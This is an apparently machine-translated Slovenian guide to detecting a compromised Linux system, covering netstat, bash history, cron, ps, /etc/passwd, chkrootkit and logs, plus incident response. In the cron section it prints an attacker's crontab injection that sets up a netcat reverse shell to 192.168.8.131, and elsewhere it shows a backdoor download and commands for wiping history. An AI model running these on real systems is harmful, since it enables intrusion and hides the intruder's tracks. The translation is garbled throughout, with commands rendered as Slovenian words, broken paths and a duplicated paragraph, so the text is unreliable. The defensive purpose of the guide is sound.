Kako ugotoviti, ali je sistem Linux ogrožen

Obstaja veliko razlogov, zakaj bi se heker vdrl v vaš sistem in vam povzročil resne težave. Mogoče je bilo pred leti pokazati svoje znanje, danes pa so nameni takšnih dejavnosti lahko veliko bolj zapleteni z veliko širšimi posledicami za žrtev. To se morda sliši očitno, toda samo zato, ker se »vse zdi v redu«, še ne pomeni, da je vse v redu. Hekerji lahko prodrejo v vaš sistem, ne da bi vas o tem obvestili in ga okužili z zlonamerno programsko opremo, da bi prevzeli popoln nadzor in celo za bočno gibanje med sistemi. Zlonamerna programska oprema je lahko skrita v sistemu in služi kot zakulisna vrata ali sistem Command & Control za hekerje za izvajanje zlonamernih dejavnosti v vašem sistemu.Bolje je biti varen kot žal. Morda ne boste takoj ugotovili, da je vaš sistem vdrl, vendar lahko na nekaj načinov ugotovite, ali je vaš sistem ogrožen. Ta članek bo obravnaval, kako ugotoviti, ali je vaš Linux nepooblaščena oseba ogrozila sistem ali se bot v vaš sistem prijavlja za zlonamerne dejavnosti.

Netstat

Netstat je pomemben pripomoček za omrežje TCP / IP ukazne vrstice, ki ponuja informacije in statistiko o protokolih v uporabi in aktivnih omrežnih povezavah.

Uporabili bomo netstat na primeru računalnika žrtev, da z naslednjim ukazom preveri, ali je v aktivnih omrežnih povezavah kaj sumljivega:

[e-pošta zaščitena]: ~ $ netstat -antp

Tu bomo videli vse trenutno aktivne povezave. Zdaj bomo iskali povezave, ki je ne bi smelo biti.

Tukaj je, aktivna povezava na PORT 44999 (pristanišče, ki ne sme biti odprto).O povezavi lahko vidimo druge podrobnosti, kot je PID, in ime programa, ki se izvaja v zadnjem stolpcu. V tem primeru je PID je 1555 in zlonamerni tovor, ki ga izvaja, je ./ lupina.elf mapa.

Še en ukaz za preverjanje vrat, ki trenutno poslušajo in so aktivna v vašem sistemu, je naslednji:

[e-pošta zaščitena]: ~ $ netstat -la

To je precej grd rezultat. Za filtriranje poslušanja in vzpostavljenih povezav bomo uporabili naslednji ukaz:

[zaščiteno po e-pošti]: ~ $ netstat -la | grep “POSLUŠAJ” “VZPOSTAVLJENO”

Tako boste dobili samo tiste rezultate, ki so za vas pomembni, da jih boste lažje razvrstili. Vključena je aktivna povezava pristanišče 44999 v zgornjih rezultatih.

Ko prepoznate zlonamerni postopek, ga lahko prekinete z naslednjimi ukazi. Opazili bomo PID procesa z ukazom netstat in postopek ubijete z naslednjim ukazom:

[zaščiteno po e-pošti]: ~ $ kill 1555

~.bash-zgodovina

Linux vodi evidenco, kateri uporabniki so se prijavili v sistem, iz katerega IP-ja, kdaj in kako dolgo.

Do teh informacij lahko dostopate s pomočjo zadnji ukaz. Rezultat tega ukaza bi bil naslednji:

[zaščiteno po e-pošti]: ~ $ zadnji

Izhod prikazuje uporabniško ime v prvem stolpcu, Terminal v drugem, izvorni naslov v tretjem, čas prijave v četrtem stolpcu in skupni čas seje, zabeležen v zadnjem stolpcu. V tem primeru uporabniki usman in ubuntu so še vedno prijavljeni. Če opazite kakršno koli sejo, ki ni dovoljena ali je zlonamerna, si oglejte zadnji odsek tega članka.

Zgodovina beleženja je shranjena v ~.bash-zgodovina mapa. Tako lahko zgodovino enostavno odstranite tako, da izbrišete .bash-zgodovina mapa. To dejanje napadalci pogosto izvajajo, da bi si zakrili sledi.

[e-pošta zaščitena]: ~ $ mačka .bash_history

Ta ukaz bo prikazal ukaze, ki se izvajajo v vašem sistemu, zadnji ukaz pa bo izveden na dnu seznama.

Zgodovino lahko počistite z naslednjim ukazom:

[e-pošta zaščitena]: ~ $ zgodovina -c

Ta ukaz bo samo izbrisal zgodovino iz terminala, ki ga trenutno uporabljate. Torej obstaja bolj pravilen način:

[zaščiteno po e-pošti]: ~ $ cat / dev / null> ~ /.bash_history

S tem boste izbrisali vsebino zgodovine, a datoteko ohranili na mestu. Torej, če vidite samo trenutno prijavo po zagonu zadnji ukaz, to sploh ni dober znak. To pomeni, da je bil vaš sistem morda ogrožen in da je napadalec verjetno izbrisal zgodovino.

Če sumite na zlonamernega uporabnika ali IP, se prijavite kot ta uporabnik in zaženite ukaz zgodovino, kot sledi:

[e-pošta zaščitena]: ~ $ su
[zaščiteno po e-pošti]: ~ $ zgodovina

Ta ukaz bo prikazal zgodovino ukazov z branjem datoteke .bash-zgodovina v / domov mapo tega uporabnika. Previdno poiščite wget, curl, ali netcat ukaze, če jih je napadalec uporabil za prenos datotek ali za namestitev orodij, kot so kripto-rudarji ali neželeni roboti.

Oglejte si spodnji primer:

Zgoraj lahko vidite ukaz “wget https: // github.com / sajith / mod-rootme." V tem ukazu je heker poskušal s pomočjo dostopati do datoteke, ki ni v repo wget prenesti zakulisje, imenovano "mod-root me", in ga namestiti v svoj sistem. Ta ukaz v zgodovini pomeni, da je sistem ogrožen in da ga je napadalec zaščitil nazaj.

Ne pozabite, da je to datoteko mogoče zlahka izgnati ali proizvesti njeno snov. Podatkov, ki jih daje ta ukaz, ne smemo jemati kot določene resničnosti. V primeru, da je napadalec ukazal "slabo" in zanemaril evakuacijo zgodovine, bo tam.

Cron Jobs

Opravila Cron lahko služijo kot bistveno orodje, če so konfigurirana za nastavitev povratne lupine na napadalcu. Urejanje opravil cron je pomembna spretnost, pa tudi znanje, kako si jih ogledati.

Za ogled opravil cron, ki se izvajajo za trenutnega uporabnika, bomo uporabili naslednji ukaz:

[zaščiteno po e-pošti]: ~ $ crontab -l

Za ogled opravil cron, ki se izvajajo za drugega uporabnika (v tem primeru Ubuntu), bomo uporabili naslednji ukaz:

[e-pošta zaščitena]: ~ $ crontab -u ubuntu -l

Za ogled dnevnih, urnih, tedenskih in mesečnih opravil cron bomo uporabili naslednje ukaze:

Daily Cron Jobs:

[zaščiteno po e-pošti]: ~ $ ls -la / etc / cron.vsak dan

Urna dela za Cron:

[zaščiteno po e-pošti]: ~ $ ls -la / etc / cron.na uro

Tedenska Cron Jobs:

[zaščiteno po e-pošti]: ~ $ ls -la / etc / cron.tedensko

Vzemite primer:

Napadalec lahko postavi cron / etc / crontab ki zažene zlonamerni ukaz 10 minut vsako uro. Napadalec lahko preko zlonamerne storitve zažene tudi zlonamerno storitev ali obratno lupino netcat ali kakšen drug pripomoček. Ko izvedete ukaz $ ~ crontab -l, videli boste, da se opravilo cron izvaja pod:

[zaščiteno po e-pošti]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44999 '
printf "$ CT" | crontab -
ps pom

Če želite pravilno preveriti, ali je bil vaš sistem ogrožen, je pomembno tudi, da si ogledate tekoče procese. Obstajajo primeri, ko nekateri nepooblaščeni procesi ne porabijo dovolj CPU-ja, da bi bili navedeni na seznamu vrh ukaz. Tam bomo uporabili ps ukaz za prikaz vseh trenutno izvajanih procesov.

[zaščiteno po e-pošti]: ~ $ ps auxf

V prvem stolpcu je prikazan uporabnik, v drugem stolpcu je prikazan edinstven ID procesa, v naslednjih stolpcih pa je prikazana poraba procesorja in pomnilnika.

V tej tabeli boste našli največ informacij. Preglejte vsak zagnani postopek in poiščite kaj posebnega, če želite vedeti, ali je sistem ogrožen ali ne. Če najdete kaj sumljivega, ga poiščite v Googlu ali zaženite z tudi ukaz, kot je prikazano zgoraj. To je dobra navada za tek ps ukaze na vašem strežniku, kar vam bo povečalo možnosti, da najdete kaj sumljivega ali izven vaše vsakodnevne rutine.

/ etc / passwd

The / etc / passwd datoteka beleži vsakega uporabnika v sistemu. To je datoteka, ločena z dvopičjem, ki vsebuje informacije, kot so uporabniško ime, uporabniški ID, šifrirano geslo, GroupID (GID), polno ime uporabnika, domači imenik uporabnika in prijavna lupina.

Če napadalec vdre v vaš sistem, obstaja možnost, da bo ustvaril več uporabnikov, da bo stvari ločeval ali ustvaril zakulisje v vašem sistemu, da se bo lahko vrnil nazaj v to zakulisje. Med preverjanjem, ali je bil vaš sistem ogrožen, preverite tudi vsakega uporabnika v datoteki / etc / passwd. Vnesite naslednji ukaz, da to storite:

[zaščiteno po e-pošti]: ~ $ cat etc / passwd

Ta ukaz vam bo dal izhod, podoben spodnjemu:

gnome-začetna-nastavitev: x: 120: 65534 :: / run / gnome-začetna-nastavitev /: / bin / false
gdm: x: 121: 125: Upravitelj zaslona Gnome: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: skrbnik PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Upravitelj svetlobnega zaslona: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Upravitelj zaslona Gnome: / var / lib / gdm3: / bin / false
anonimno: x: 1002: 1002: ,,,: / home / anonimno: / bin / bash

Zdaj boste želeli poiskati vsakega uporabnika, ki ga ne poznate. V tem primeru lahko v datoteki z imenom »anonimen« vidite uporabnika.”Še ena pomembna stvar, ki jo je treba opozoriti, je, da če je napadalec ustvaril uporabnika, s katerim se bo znova prijavil, bo uporabniku dodeljena tudi lupina“ / bin / bash ”. Torej lahko iskanje zožite tako, da zapišete naslednji izhod:

[zaščiteno po e-pošti]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: skrbnik PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonimno: x: 1002: 1002: ,,,: / home / anonimno: / bin / bash

Za natančnejšo obdelavo lahko izvedete še nekaj "bash magic".

[zaščiteno po e-pošti]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | cut -d ":" -f 1
usman
postgres
ubuntu
anonimno

Najti

Časovna iskanja so koristna za hitro triažo. Uporabnik lahko spreminja tudi časovne žige, ki spreminjajo datoteke. Za izboljšanje zanesljivosti v merila vključite ctime, saj ga je veliko težje posegati, ker zahtevajo spremembe nekaterih datotek na ravni.

Z naslednjim ukazom lahko poiščete datoteke, ustvarjene in spremenjene v zadnjih 5 dneh:

[zaščiteno po e-pošti]: ~ $ find / -mtime -o -ctime -5

Za iskanje vseh datotek SUID v lasti root in preverjanje, ali so na seznamih nepričakovani vnosi, bomo uporabili naslednji ukaz:

[e-pošta zaščitena]: ~ $ find / -perm -4000 -user root -type f

Če želimo najti vse datoteke SGID (set user ID) v lasti root in preveriti, ali so na seznamih nepričakovani vnosi, bomo uporabili naslednji ukaz:

[email protected]: ~ $ find / -perm -6000 -type f

Chkrootkit

Rootkits so ena najhujših stvari, ki se lahko zgodijo sistemu, in so eden najnevarnejših napadov, bolj nevaren kot zlonamerna programska oprema in virusi, tako zaradi škode, ki jo povzročijo sistemu, kot tudi težav pri iskanju in odkrivanju.

Zasnovani so tako, da ostanejo skriti in počnejo zlonamerne stvari, na primer krajo kreditnih kartic in podatke o spletnem bančništvu. Rootkits dajte spletnim kriminalcem možnost nadzora vašega računalniškega sistema. Rootkits tudi napadalcu pomaga, da spremlja vaše pritiske tipk in onemogoči protivirusno programsko opremo, kar še olajša krajo vaših zasebnih podatkov.

Te vrste zlonamerne programske opreme lahko ostanejo v vašem sistemu dlje časa, ne da bi jih uporabnik sploh opazil, in lahko povzročijo resno škodo. Ko je Rootkit ni mogoče najti drugega načina, kot da ponovno namestite celoten sistem. Včasih lahko ti napadi povzročijo celo okvaro strojne opreme.

Na srečo obstaja nekaj orodij, ki lahko pomagajo odkriti Rootkits na sistemih Linux, kot so Lynis, Clam AV ali LMD (Linux Malware Detect). Svoj sistem lahko preverite, ali je znan Rootkits z uporabo spodnjih ukazov.

Najprej namestite Chkrootkit prek naslednjega ukaza:

[zaščiteno po e-pošti]: ~ $ sudo apt install chkrootkit

To bo namestilo datoteko Chkrootkit orodje. S tem orodjem lahko z naslednjim ukazom preverite Rootkits:

[e-pošta zaščitena]: ~ $ sudo chkrootkit

Paket Chkrootkit je sestavljen iz skripte lupine, ki preverja sistemske binarne datoteke za spremembe rootkit-a, pa tudi več programov, ki preverjajo različna varnostna vprašanja. V zgornjem primeru je paket preveril, ali je v sistemu znak Rootkit, in ga ni našel. No, to je dober znak!

Dnevniki Linuxa

Dnevniki Linuxa vsebujejo časovni razpored dogodkov v delovnem okolju in aplikacijah Linuxa in so pomemben preiskovalni instrument, ko imate težave. Primarna naloga, ki jo mora opraviti skrbnik, ko ugotovi, da je sistem ogrožen, mora biti seciranje vseh zapisov dnevnika.

Za eksplicitne težave z aplikacijami na delovnem območju se evidence dnevnika vodijo v stikih z različnimi področji. Chrome na primer sestavi poročila o zrušitvah v '~ /.chrome / Poročila o zrušitvah '), kjer aplikacija na delovnem območju sestavlja dnevnike, ki so odvisni od inženirja, in prikazuje, ali aplikacija upošteva ureditev dnevnika po meri. Zapisi so v/ var / log imenik. Obstajajo dnevniki Linuxa za vse: ogrodje, porcije, poglavja snopov, zagonske obrazce, Xorg, Apache in MySQL. V tem članku se bo tema izrecno osredotočila na dnevnike okolja Linux.

Ta katalog lahko preklopite z uporabo vrstnega reda zgoščenk. Za ogled ali spreminjanje dnevniških datotek bi morali imeti root dovoljenja.

[zaščiteno po e-pošti]: ~ $ cd / var / log

Navodila za ogled dnevnikov Linuxa

Za ogled potrebnih dokumentov dnevnika uporabite naslednje ukaze.

Dnevnike Linuxa je mogoče videti z ukazom cd / var / log, na tej točki s sestavljanjem naročila, da vidite dnevnike, pospravljene pod ta katalog. Eden najpomembnejših dnevnikov je syslog, ki beleži veliko pomembnih dnevnikov.

ubuntu @ ubuntu: mačji syslog

Za sanacijo rezultatov bomo uporabili "manj " ukaz.

ubuntu @ ubuntu: mačji syslog | manj

Vnesite ukaz var / log / syslog videti kar nekaj stvari pod datoteko syslog. Osredotočanje na določeno vprašanje bo trajalo nekaj časa, saj bo ta zapis običajno dolg. Pritisnite Shift + G, da se v zapisu pomaknete navzdol do END, ki ga označuje »END."

Dnevnike si lahko ogledate tudi s pomočjo dmesg, ki natisne nosilec obroča. Ta funkcija natisne vse in vas pošlje čim dlje po dokumentu. Od tega trenutka lahko uporabite naročilo dmesg | manj pogledati donos. V primeru, da morate videti dnevnike za danega uporabnika, boste morali zagnati naslednji ukaz:

dmesg - objekt = uporabnik

Za zaključek lahko uporabite rep, da si ogledate dnevniške dokumente. Je majhen, a uporaben pripomoček, ki ga lahko uporabimo, saj se uporablja za prikaz zadnjega dela dnevnikov, kjer je najverjetneje prišlo do težave. Določite lahko tudi število zadnjih bajtov ali vrstic, ki jih želite prikazati v ukazu tail. Za to uporabite ukaz tail / var / log / syslog. Obstaja veliko načinov za ogled dnevnikov.

Za določeno število vrstic (model upošteva zadnjih 5 vrstic) vnesite naslednji ukaz:

[e-pošta zaščitena]: ~ $ tail -f -n 5 / var / log / syslog

S tem boste natisnili zadnjih 5 vrstic. Ko pride druga linija, bodo prejšnjo evakuirali. Če se želite izogniti vrstnemu redu, pritisnite Ctrl + X.

Pomembni dnevniki za Linux

Primarni štirje dnevniki Linuxa vključujejo:

Dnevniki aplikacij
Dnevniki dogodkov
Dnevniki storitev
Sistemski dnevniki

ubuntu @ ubuntu: mačji syslog | manj

/ var / log / syslog ali / var / log / messages: splošna sporočila, tako kot okvirni podatki. Ta dnevnik shranjuje vse informacije o ukrepih po vsem svetu.

ubuntu @ ubuntu: mačka auth.dnevnik | manj

/ var / log / auth.log ali / var / log / secure: shranite dnevnike preverjanja, vključno z učinkovitimi in zmedenimi prijavami in strategijami preverjanja. Uporaba Debiana in Ubuntuja / var / log / auth.log za shranjevanje poskusov prijave, medtem ko Redhat in CentOS uporabljata / var / log / secure za shranjevanje dnevnikov preverjanja pristnosti.

ubuntu @ ubuntu: mačji zagon.dnevnik | manj

/ var / log / boot.log: vsebuje informacije o zagonu in sporočilih med zagonom.

ubuntu @ ubuntu: mačji dnevnik | manj

/ var / log / maillog ali / var / log / mail.dnevnik: shrani vse dnevnike, identificirane s poštnimi strežniki; dragoceno, ko potrebujete podatke o postfix, smtpd ali kateri koli administraciji, povezani z e-pošto, ki se izvaja na vašem strežniku.

ubuntu @ ubuntu: mačka kern | manj

/ var / log / kern: vsebuje informacije o dnevnikih jedra. Ta dnevnik je pomemben za preiskovanje porcij po meri.

ubuntu @ ubuntu: mačka dmesg | manj

/ var / log / dmesg: vsebuje sporočila, ki identificirajo gonilnike pripomočkov. Vrstni red dmesg lahko uporabite za ogled sporočil v tem zapisu.

ubuntu @ ubuntu: dnevnik neuspešnih mačk | manj

/ var / log / errorlog: vsebuje podatke o vseh neuspelih poskusih prijave, dragocene za pridobivanje delcev znanja o poskusih varnostnih vdorov; na primer tisti, ki želijo vdreti v certifikate za prijavo, tako kot napadi na živali.

ubuntu @ ubuntu: mačka cron | manj

/ var / log / cron: shrani vsa sporočila, povezana s Cron; na primer zaposlitve cron ali ko je demon cron začel poklic, povezana s tem razočaranje itd.

ubuntu @ ubuntu: mačka njam.dnevnik | manj

/ var / log / yum.log: v primeru, da predstavite svežnje z uporabo naročila yum, ta dnevnik shrani vse povezane podatke, kar je lahko v pomoč pri odločitvi, ali so bili paket in vsi segmenti učinkovito predstavljeni.

ubuntu @ ubuntu: mačka httpd | manj

/ var / log / httpd / ali / var / log / apache2: ta dva imenika se uporabljata za shranjevanje vseh vrst dnevnikov za strežnik Apache HTTP, vključno z dnevnikom dostopa in dnevnika napak. Datoteka error_log vsebuje vse slabe zahteve, ki jih je prejel http strežnik. Te napake vključujejo težave s spominom in druge napake, povezane z ogrodjem. Dostopni_log vsebuje zapis vseh prošenj, prejetih prek HTTP.

ubuntu @ ubuntu: mačka mysqld.dnevnik | manj

/ var / log / mysqld.log ali/ var / log / mysql.log : dnevnik dnevnika MySQL, ki beleži vsa sporočila o napakah, odpravljanju napak in uspehu. To je še en pojav, ko ogrodje usmerja v register; RedHat, CentOS, Fedora in drugi ogrodji, ki temeljijo na RedHat, uporabljajo / var / log / mysqld.log, medtem ko Debian / Ubuntu uporablja / var / log / mysql.log katalog.

Orodja za ogled dnevnikov Linuxa

Danes je na voljo veliko odprtokodnih sledilcev dnevnikov in naprav za pregled, zato je izbira pravilnih sredstev za dnevnike dejanj enostavnejša, kot bi lahko sumili. Brezplačni in odprtokodni pregledovalniki dnevnikov lahko delo opravijo v katerem koli sistemu. Tu je pet najboljših, ki sem jih uporabil v preteklosti, brez posebnega vrstnega reda.

SIVI LOG

Greylog, ki se je začel leta 2011 v Nemčiji, je zdaj na voljo kot odprtokodna naprava ali kot poslovna ureditev. Greylog naj bi bil združen okvir za prijavo na ploščo, ki sprejema tokove informacij z različnih strežnikov ali končnih točk in vam omogoča hitro pregledovanje ali razčlenitev teh podatkov.

Graylog je zaradi enostavnosti in vsestranskosti dosegel pozitiven sloves med glavami ogrodja. Večina spletnih podjetij se začne malo, vendar se lahko razvija eksponentno. Graylog lahko prilagodi sklade prek sistema zalednih strežnikov in vsak dan obdela nekaj terabajtov podatkov dnevnika.

Predsedniki informacijskih sistemov bodo videli sprednji del vmesnika GrayLog preprost za uporabo in uporaben. Graylog se izogiba ideji armaturnih plošč, ki uporabnikom omogoča, da izberejo vrsto meritev ali vire informacij, ki se jim zdijo pomembni, in po določenem času hitro opazijo naklone.

Ko pride do varnostne ali izvršilne epizode, morajo predsedniki IT imeti možnost, da spremljajo manifestacije osnovnemu gonilniku, kakor hitro je razumno mogoče pričakovati. Funkcija iskanja Graylog to nalogo poenostavi. To orodje je delovalo pri prilagajanju na notranje okvare, ki lahko vodijo večnamenske podvige, tako da lahko skupaj razbijete nekaj potencialnih nevarnosti.

NAGIOS

Nagios, ki ga je leta 1999 ustanovil en razvijalec, je od takrat napredoval v enega najbolj trdnih odprtokodnih instrumentov za nadzor informacij dnevnika. Sedanjo izročitev Nagiosa je mogoče uporabiti v strežnikih s kakršnim koli operacijskim sistemom (Linux, Windows itd.).

Nagiosova bistvena postavka je dnevniški strežnik, ki poenostavlja izbor informacij in omogoča postopno dostopnost podatkov vodjem ogrodja. Motor strežnika dnevnika Nagios bo informacije zajemal postopoma in jih usmeril v revolucionarni iskalni instrument. Vključitev z drugo končno točko ali aplikacijo je preprost napitek za ta čarovnik, ki je del njega.

Nagios se pogosto uporablja v združenjih, ki morajo preverjati varnost svojih sosesk, in lahko pregleda vrsto priložnosti, povezanih s sistemom, da pomaga robotizirati prenos opozoril. Nagios je mogoče programirati za izvajanje določenih nalog, ko je izpolnjen določen pogoj, kar uporabnikom omogoča zaznavanje težav, še preden so vključene človekove potrebe.

Kot glavni vidik ocenjevanja sistema bo Nagios usmerjal informacije dnevnika, odvisno od geografskega območja, kjer se začne. Za ogled pretoka spletnega prometa je mogoče uporabiti popolne nadzorne plošče z inovacijami pri kartiranju.

LOGALIZIRANJE

Logalyze izdeluje odprtokodna orodja za direktorje ogrodja ali skrbnike sistemov in varnostne strokovnjake, ki jim pomagajo pri nadzoru strežniških dnevnikov in jim omogočijo, da se osredotočijo na preoblikovanje dnevnikov v dragocene informacije. Bistvena točka tega orodja je, da je na voljo kot brezplačen prenos za domačo ali poslovno uporabo.

Bistveni element Nagiosa je dnevniški strežnik, ki poenostavlja izbor informacij in podatke postopoma daje na voljo vodjem okolja. Motor strežnika dnevnika Nagios bo informacije zajemal postopoma in jih usmeril v revolucionarni iskalni instrument. Vključitev z drugo končno točko ali aplikacijo je preprost napitek za ta čarovnik, ki je vgrajen v aranžma.

Kaj storiti, če ste bili ogroženi?

Glavna stvar je brez panike, še posebej, če je nepooblaščena oseba prijavljena zdaj. Morali bi imeti možnost, da prevzamete nadzor nad strojem, preden druga oseba ve, da veste zanje. V primeru, da vedo, da se zavedate njihove prisotnosti, vas bo napadalec morda pustil stran od strežnika in začel uničevati vaš sistem. Če niste tako tehnični, morate takoj izključiti celoten strežnik. Strežnik lahko zaustavite z naslednjimi ukazi:

[e-pošta zaščitena]: ~ $ shutdown -h zdaj

Ali

[zaščiteno po e-pošti]: ~ $ systemctl poweroff

Drug način za to je, da se prijavite na nadzorno ploščo ponudnika gostovanja in jo od tam izklopite. Ko je strežnik izklopljen, lahko delate na pravilih požarnega zidu, ki so potrebna, in se ob svojem času posvetujte s kom za pomoč.

Če se počutite bolj samozavestno in ima vaš ponudnik gostovanja gorvodni požarni zid, potem ustvarite in omogočite naslednja dva pravila:

Dovoli SSH promet samo z vašega naslova IP.
Blokirajte vse ostalo, ne samo SSH, temveč tudi vsak protokol, ki se izvaja na vseh vratih.

Če želite preveriti aktivne seje SSH, uporabite naslednji ukaz:

[zaščiteno po e-pošti]: ~ $ ss | grep ssh

Za uničenje njihove seje SSH uporabite naslednji ukaz:

[zaščiteno po e-pošti]: ~ $ kill

To bo uničilo njihovo sejo SSH in vam omogočilo dostop do strežnika. Če nimate dostopa do zgornjega požarnega zidu, boste morali na samem strežniku ustvariti in omogočiti pravila požarnega zidu. Potem, ko so nastavljena pravila požarnega zidu, prek ukaza »ubiti« prekini sejo nepooblaščenega uporabnika SSH.

Zadnja tehnika, kjer je na voljo, se v strežnik prijavite z zunajpasovno povezavo, kot je serijska konzola. Ustavite vsa omrežja z naslednjim ukazom:

[zaščiteno po e-pošti]: ~ $ systemctl zaustavi omrežje.storitev

S tem boste popolnoma ustavili sistem, ki pride do vas, tako da boste lahko zdaj omogočili nadzor požarnega zidu ob svojem času.

Ko si povrnete nadzor nad strežnikom, mu ne boste zlahka zaupali. Ne poskušajte stvari popraviti in ponovno uporabiti. Kar je pokvarjenega, ni mogoče popraviti. Nikoli ne bi vedeli, kaj lahko stori napadalec, in zato nikoli ne bi smeli biti prepričani, da je strežnik varen. Torej, ponovna namestitev bi morala biti vaš zadnji korak.